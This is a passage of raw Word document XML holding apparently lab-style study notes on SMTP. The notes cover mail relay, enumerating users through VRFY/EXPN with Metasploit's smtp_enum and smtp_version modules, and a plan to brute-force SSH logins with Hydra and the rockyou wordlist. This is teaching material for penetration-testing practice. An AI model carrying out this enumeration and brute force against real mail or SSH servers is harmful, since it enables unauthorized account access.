        <w:t>SMTP server of sender connects to recipient SMTP server before relay. If it cannot be accessed, email gets put into SMTP queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914F021" w14:textId="75A95810" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Recipient SMTP server will verify incoming email by checking if domain and username are recognized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4541F" w14:textId="2EB4ABA7" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server then forward email to POP or IMAP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6429F58A" w14:textId="69B168CC" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Email then shows in recipient inbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560E5597" w14:textId="2A30AF0A" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>What Runs SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B7E1C2" w14:textId="2463A970" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows server platforms, variants on Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E67EB5B" w14:textId="7A882E80" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CECDE" w14:textId="2CF7AD67" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating Server Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C41FDC" w14:textId="5DF47346" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Poorly configured or vulnerable mail servers often provide initial foothold into a network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F72FA8" w14:textId="12E2EE72" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>First fingerprint server via “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smtp_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A82DA" w14:textId="3C355A43" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Scans range of IP addresses and determines the version of any email servers it encounters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D47F53" w14:textId="35DF31D4" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating Users from SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E876230" w14:textId="1F08FD71" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SMTP service has two internal commands allowing enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF9259" w14:textId="20DFE284" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>VRFY – confirming names of valid users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801A790" w14:textId="7804AC0A" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXPN – reveals actual address of user’s aliases and lists of emails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6648F949" w14:textId="5B34D480" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Done with Metasploit “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smtp_enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C90D3E" w14:textId="5277D0E7" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Feed module host or range of hosts to scan as well as wordlist containing usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59961BC3" w14:textId="37B3B12F" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A1184B" w14:textId="419487A6" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Metaplsoit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and update/upgrade via sudo apt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A24BF4C" w14:textId="148E7998" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB697A" w14:textId="10C17F1F" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration technique will work for majority of SMTP configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A367345" w14:textId="7B780551" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Non Metasploit tools such as smtp-user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for OS-level user accounts on Solaris</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4670F2E8" w14:textId="46885FBD" w:rsidR="00EB523F" w:rsidRPr="0084205E" w:rsidRDefault="00EB523F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Performed by inspecting responses to VRFY, EXPN, and RCPT TO commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CDBE1B" w14:textId="432F830E" w:rsidR="00EF42C2" w:rsidRPr="0084205E" w:rsidRDefault="00EF42C2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using Metasploit for SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C38B34" w14:textId="71B84F29" w:rsidR="00EF42C2" w:rsidRPr="0084205E" w:rsidRDefault="00EF42C2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smtp_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46C1C61D" w14:textId="17F20198" w:rsidR="00EF42C2" w:rsidRPr="0084205E" w:rsidRDefault="00EF42C2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A33E495" w14:textId="1E2B4B3F" w:rsidR="00EF42C2" w:rsidRPr="0084205E" w:rsidRDefault="00EF42C2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B4C8CB" w14:textId="55288303" w:rsidR="00EF42C2" w:rsidRPr="0084205E" w:rsidRDefault="00EF42C2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Need to set RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E36F730" w14:textId="352759BE" w:rsidR="00EF42C2" w:rsidRPr="0084205E" w:rsidRDefault="00EF42C2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E096F5" w14:textId="632FB608" w:rsidR="00EF42C2" w:rsidRPr="0084205E" w:rsidRDefault="00752AD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check system mail name next to ESMTP Postfix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38672FFE" w14:textId="06498EDC" w:rsidR="00752AD9" w:rsidRPr="0084205E" w:rsidRDefault="00752AD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Postfix = mail transfer agent (MTA) running SMTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA5062" w14:textId="6C493B99" w:rsidR="00752AD9" w:rsidRPr="0084205E" w:rsidRDefault="00752AD9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Search “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smtp_enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50805FDB" w14:textId="39B9C918" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Set USER_FILE to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/Usernames/top-usernames-shortlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27645FCF" w14:textId="366DAD1F" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RHOSTS - &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28973EC7" w14:textId="05B3A382" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>THREADS – 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419F5F0" w14:textId="18802328" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2058E5" w14:textId="208D1FFB" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110A26B" w14:textId="41354D8B" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Following enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ECA444" w14:textId="0B43D341" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User account name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C0F9F" w14:textId="47058F9D" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Type of SMTP server and operating system running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6361BD" w14:textId="7D763CD2" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSH also running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C083488" w14:textId="498EB7D0" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Attempt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> via Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032E8593" w14:textId="3A1B36AE" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rockyou.txt in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D8BB9" w14:textId="76EF4BCE" w:rsidR="00551F24" w:rsidRPr="0084205E" w:rsidRDefault="00551F24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Additional lists in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SecLists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="553C2083" w14:textId="16E4C26C" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00090055" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
